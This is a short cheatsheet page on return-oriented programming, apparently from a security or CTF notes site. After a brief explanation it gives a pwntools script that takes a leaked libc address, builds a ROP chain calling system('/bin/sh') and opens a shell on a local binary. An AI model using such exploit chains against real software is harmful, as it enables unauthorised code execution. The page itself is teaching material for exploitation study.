Binary Exploitation with ROP

Last modified: 2023-02-12

Reverse Engineering

ROP (Return-Oriented Programming) is a technique used to bypass security mechanisms such as data execution prevention (DEP) or address space layout randomization (ASLR). It allows us to exploit the arbitrary code by chaining together small, existing code snippets (called “gagdets”) within a program, rather than injecting new malicious code.

Exploitation

Pwntools can build ROP chains so we'll use it for exploitation.

from pwn import *

elf = context.binary = ELF('./example')
libc = elf.libc
p = process()

# get the base address
p.recvuntil('Enter name: ')
base_addr = int(p.recvline(), 16)

# set our libc address according to the base address
libc.address = base_addr - libc.sym['system']
log.success('LIBC base: {}'.format(hex(libc.address)))

# get location of binsh from libc
binsh = next(libc.search(b'/bin/sh'))

# build the rop chain
rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)

# send our rop chain
p.sendline(rop.chain())

# Get the shell
p.interactive()

Method

Cheatsheet

Binary Exploitation

Binary Exploitation with ROP

Exploitation

ON THIS PAGE